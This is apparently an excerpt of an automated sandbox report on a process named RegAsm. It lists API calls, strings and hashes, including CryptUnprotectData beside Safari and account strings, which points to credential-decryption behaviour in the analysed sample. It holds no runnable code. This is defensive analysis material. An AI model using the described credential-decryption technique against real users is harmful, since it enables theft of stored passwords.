                                                                                • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Temp$DirectoryFileNamePathWindows
                                                                                • String ID:
                                                                                • API String ID: 1125800050-0
                                                                                • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandleSleep
                                                                                • String ID: }A
                                                                                • API String ID: 252777609-2138825249
                                                                                • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID: BINARY
                                                                                • API String ID: 2221118986-907554435
                                                                                • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                APIs
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                • _mbscpy.MSVCRT ref: 00405250
                                                                                • _mbscat.MSVCRT ref: 0040525B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                                • String ID:
                                                                                • API String ID: 568699880-0
                                                                                • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                                                                • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsicmp
                                                                                • String ID: /stext
                                                                                • API String ID: 2081463915-3817206916
                                                                                • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                APIs
                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040957A
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: File$??2@CloseCreateHandleReadSize
                                                                                • String ID:
                                                                                • API String ID: 1023896661-0
                                                                                • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                                                                                • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                                                                                APIs
                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                • CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                • String ID:
                                                                                • API String ID: 2445788494-0
                                                                                • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcmpmemset
                                                                                • String ID:
                                                                                • API String ID: 1065087418-0
                                                                                • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                APIs
                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                • CloseHandle.KERNEL32(?), ref: 00410654
                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                • String ID:
                                                                                • API String ID: 1381354015-0
                                                                                • Opcode ID: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                                                • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                • Opcode Fuzzy Hash: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                                                • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                                                • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                                                APIs
                                                                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                  • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                  • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                • String ID:
                                                                                • API String ID: 2154303073-0
                                                                                • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                APIs
                                                                                • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: File$PointerRead
                                                                                • String ID:
                                                                                • API String ID: 3154509469-0
                                                                                • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                APIs
                                                                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                APIs
                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                APIs
                                                                                • ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                APIs
                                                                                • WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                APIs
                                                                                • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                APIs
                                                                                • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                APIs
                                                                                • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                APIs
                                                                                • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004095FC
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                  • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                                                  • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                Similarity
                                                                                • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                • String ID:
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00445426
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                Similarity
                                                                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                • String ID:
                                                                                APIs
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                  • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                • memcpy.MSVCRT ref: 00406942
                                                                                Similarity
                                                                                • API ID: ??2@FilePointermemcpy
                                                                                • String ID:
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: _wcsicmp
                                                                                • String ID:
                                                                                APIs
                                                                                  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                Similarity
                                                                                • API ID: File$CloseCreateErrorHandleLastRead
                                                                                • String ID:
                                                                                APIs
                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                Similarity
                                                                                • API ID: ??2@??3@
                                                                                • String ID:
                                                                                APIs
                                                                                • EmptyClipboard.USER32 ref: 004098EC
                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                • GetLastError.KERNEL32 ref: 0040995D
                                                                                • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                • GetLastError.KERNEL32 ref: 00409974
                                                                                • CloseClipboard.USER32 ref: 0040997D
                                                                                Similarity
                                                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                • String ID:
                                                                                APIs
                                                                                • EmptyClipboard.USER32 ref: 00409882
                                                                                • wcslen.MSVCRT ref: 0040988F
                                                                                • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                                                • memcpy.MSVCRT ref: 004098B5
                                                                                • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                • CloseClipboard.USER32 ref: 004098D7
                                                                                Similarity
                                                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                                                • String ID:
                                                                                APIs
                                                                                • GetLastError.KERNEL32 ref: 004182D7
                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                • LocalFree.KERNEL32(?), ref: 00418342
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                                                  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                                                • String ID: OsError 0x%x (%u)
                                                                                APIs
                                                                                • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                Similarity
                                                                                • API ID: Version
                                                                                • String ID:
                                                                                APIs
                                                                                • _wcsicmp.MSVCRT ref: 004022A6
                                                                                • _wcsicmp.MSVCRT ref: 004022D7
                                                                                • _wcsicmp.MSVCRT ref: 00402305
                                                                                • _wcsicmp.MSVCRT ref: 00402333
                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                • memset.MSVCRT ref: 0040265F
                                                                                • memcpy.MSVCRT ref: 0040269B
                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                • memcpy.MSVCRT ref: 004026FF
                                                                                • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                                                                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                • String ID: :stringdata$ftp://$http://$https://
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                • GetDC.USER32 ref: 004140E3
                                                                                • wcslen.MSVCRT ref: 00414123
                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                • _snwprintf.MSVCRT ref: 00414244
                                                                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                • String ID: %s:$EDIT$STATIC
                                                                                • API String ID: 2080319088-3046471546
                                                                                • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                APIs
                                                                                • EndDialog.USER32(?,?), ref: 00413221
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                • memset.MSVCRT ref: 00413292
                                                                                • memset.MSVCRT ref: 004132B4
                                                                                • memset.MSVCRT ref: 004132CD
                                                                                • memset.MSVCRT ref: 004132E1
                                                                                • memset.MSVCRT ref: 004132FB
                                                                                • memset.MSVCRT ref: 00413310
                                                                                • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                • memset.MSVCRT ref: 004133C0
                                                                                • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                • memcpy.MSVCRT ref: 004133FC
                                                                                • wcscpy.MSVCRT ref: 0041341F
                                                                                • _snwprintf.MSVCRT ref: 0041348E
                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                • SetFocus.USER32(00000000), ref: 004134B7
                                                                                Strings
                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                • {Unknown}, xrefs: 004132A6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
